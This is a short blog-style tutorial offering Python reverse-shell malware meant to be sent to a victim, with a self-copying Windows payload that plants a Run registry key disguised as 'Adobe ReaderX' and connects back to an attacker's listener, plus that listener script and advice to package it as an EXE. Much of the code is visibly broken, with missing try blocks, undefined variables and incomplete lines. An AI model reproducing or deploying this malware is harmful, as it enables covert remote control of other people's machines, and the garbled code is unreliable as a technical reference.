Reverse Shell tutorial

Hey Guys, Finlay Here
Today I present you a reverse shell script I’ve build during some boredom.
I have the proof that it works here:
View the Proof!

Here is the “” (which you send to the victim):

# Please support me and my development by making a donation to:
# BTC: 1Gay22nGSs5tXArmABtSHGjKQTerMpptFV
import sys, base64, os, socket, subprocess
from _winreg import *

def autorun(tempdir, fileName, run):
# Copy executable to %TEMP%:
    os.system('copy %s %s'%(fileName, tempdir))

# Queries Windows registry for the autorun key value
# Stores the key values in runkey array
    key = OpenKey(HKEY_LOCAL_MACHINE, run)
    runkey =[]
        i = 0
        while True:
            subkey = EnumValue(key, i)
            i += 1
    except WindowsError:

# If the autorun key "Adobe ReaderX" isn't set this will set the key:
    if 'Adobe ReaderX' not in runkey:
            key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)
            SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")
        except WindowsError:

def shell():
#Base64 encoded reverse shell
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('', int(1998)))
    s.send('[*] Connection Established!')
    while 1:
        data = s.recv(1024)
        if data == "quit": break
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        stdout_value = +
        encoded = base64.b64encode(stdout_value)

def main():
    tempdir = '%TEMP%'
    fileName = sys.argv[0]
    run = "Software\Microsoft\Windows\CurrentVersion\Run"
    autorun(tempdir, fileName, run)

if __name__ == "__main__":

Please note that you need to have to chance the IP and port to suit your scenario.
Also here is the (which should be running on your box!)

import socket

s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 1998))
print "Listening on port 1998... "
(client, (ip, port)) = s.accept()
print " Received connection from : ", ip

while True:
    command = raw_input('~$ ')
    encode = bytearray(command)
    for i in range(len(encode)):
        encode[i] ^=0x41
    decode = bytearray(en_data)
    for i in range(len(decode)):
        decode[i] ^=0x41
    print decode


so these scripts are build fairly easily, and probably not very effective.
build when you build them to an EXE (PyInstaller anyone?), send them to a windows server, and boom, you’re a god now! (sorta…)

Please use these scripts for education only!
I’m not going to help you if you get in trouble!

Leave a reply